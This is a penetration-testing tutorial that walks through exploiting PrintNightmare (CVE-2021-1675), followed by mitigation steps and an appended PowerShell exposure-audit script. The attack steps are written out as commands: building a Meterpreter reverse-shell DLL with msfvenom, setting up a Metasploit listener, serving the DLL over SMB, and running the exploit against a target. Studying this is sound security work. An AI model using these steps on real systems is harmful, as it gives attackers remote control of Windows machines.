# PrintNightmare (CVE-2021-1675)

**PrintNightmare (CVE-2021-1675)**  is a critical vulnerability in the Windows Print Spooler service that allows remote code execution. This vulnerability can be exploited to execute malicious DLLs either remotely or locally on affected machines.

#### Step-by-Step Process to Check for the PrintNightmare Vulnerability

1. **Check if the Domain is Vulnerable:**

   Use the following [script](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) to test if your domain is vulnerable to PrintNightmare:

<figure><img src="/files/BhskYe2YhQvnuC1XJzUm" alt=""><figcaption></figcaption></figure>

If you see this output, the target is vulnerable.

2. **Installation:**

   Before executing the exploit, ensure you have the correct version of **Impacket** installed. Follow these steps:

   1. Uninstall the default Impacket version:

      ```bash
      pip3 uninstall impacket
      ```
   2. Clone the custom Impacket repository:

      ```bash
      git clone https://github.com/cube0x0/impacket
      cd impacket
      python3 ./setup.py install
      ```

To create a Meterpreter payload that will provide remote shell access, use **msfvenom** to generate a malicious DLL:

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=5555 -f dll > shell.dll
```

<figure><img src="/files/6yz3oZcpXdSntFJBSQ7P" alt=""><figcaption></figcaption></figure>

**3. Setting Up the Metasploit Listener**

1. **Open Metasploit Framework:**

<figure><img src="/files/nLitd63x5yW0C81UeFhf" alt=""><figcaption></figcaption></figure>

**Use the `multi/handler` exploit:**

```bash
use exploit/multi/handler
```

**Set the payload:**

```bash
set payload windows/x64/meterpreter/reverse_tcp
```

**Configure the listener with your IP and port:**

```bash
set LHOST <your_ip>
set LPORT 5555
```

**Verify the settings:**

```bash
options
```

**Run the exploit:**

```bash
run
```

<figure><img src="/files/GECJGGa2HFRgQMkW7y43" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/o9jzMYpTl4OPk7y51uS7" alt=""><figcaption></figcaption></figure>

**4. Setting Up File Sharing (SMB)**

You need to share the location of your payload (`shell.dll`) so that it can be accessed by the target machine.

1. **Start an SMB server** to share the directory containing `shell.dll`:

   ```bash
   # Add the -smb2support flag if the target refuses SMBv1.
   python3 smbserver.py share <path-to-your-directory>
   ```

<figure><img src="/files/3PHTl89OQZGJeflof7DV" alt=""><figcaption><p>Now we share the whole current directory.</p></figcaption></figure>

**5. Running the PrintNightmare Exploit**

Now that everything is set up, execute the **PrintNightmare** exploit. This is done by running the `CVE-2021-1675.py` script.

```bash
python3 CVE-2021-1675.py <domain>/<any-user>:<password>@<target-ip> '\\<file-share-location>'
```

<figure><img src="/files/oKcIDIVijpyHCBbwBFML" alt=""><figcaption></figcaption></figure>

**6. Post-Exploit: Catch the Meterpreter Session**

After executing the exploit, you should see a connection from the target system in Metasploit. Once the payload is triggered, you'll have a Meterpreter session established, allowing you to interact with the compromised system.

#### Mitigation

**Microsoft has released patches** for this vulnerability, but a patched system may still be exploitable if the following Point and Print policy values are present:

```powershell
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
```

To mitigate this vulnerability, ensure these values are set to the correct restrictions or disable the Print Spooler service altogether.

#### Disable the Spooler Service

You can disable the **Spooler service** to prevent further exploitation:

```powershell
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
```

This will stop and disable the Print Spooler service on the target machine.
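As an added example (not part of the original notes), the PowerShell audit below reads the two Point and Print values shown above together with the Spooler service state and reports whether the host is still exposed; the function name `Get-PrintNightmareExposure` is my own.

```powershell
# Added example: audit one host's PrintNightmare mitigation state.
# Reads the PointAndPrint policy values and the Spooler service, then reports
# every setting that still leaves the host exposed. No elevation needed to read HKLM.
function Get-PrintNightmareExposure {
    [CmdletBinding()]
    param()

    $policyKey = 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $findings  = @()

    # $pp is $null when the key is absent; property reads on $null simply yield $null.
    $pp       = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue
    $restrict = $pp.RestrictDriverInstallationToAdministrators
    $noWarn   = $pp.NoWarningNoElevationOnInstall

    # An explicit 0 lets non-administrators install printer drivers again.
    if ($restrict -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators = 0 (non-admins may install drivers)'
    }
    # 1 suppresses the warning and elevation prompt for Point and Print driver installs.
    if ($noWarn -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall = 1 (no prompt on driver install)'
    }

    # Spooler Start = 4 means Disabled, which removes the attack surface entirely.
    $svc   = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $start = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Spooler' `
                -ErrorAction SilentlyContinue).Start
    $spoolerDisabled = ($start -eq 4)
    if (-not $spoolerDisabled -and $svc -and $svc.Status -eq 'Running') {
        $findings += 'Spooler service is running (Start value is not 4)'
    }

    [pscustomobject]@{
        ComputerName    = $env:COMPUTERNAME
        SpoolerStatus   = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
        SpoolerDisabled = $spoolerDisabled
        Findings        = $findings
        Exposed         = ($findings.Count -gt 0)
    }
}

# Local run; for a fleet, wrap in Invoke-Command and pipe the objects to Export-Csv.
Get-PrintNightmareExposure | Format-List
```

A host reports `Exposed = False` only when both policy values are in their restrictive state (or absent) and the Spooler is either disabled or not running.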

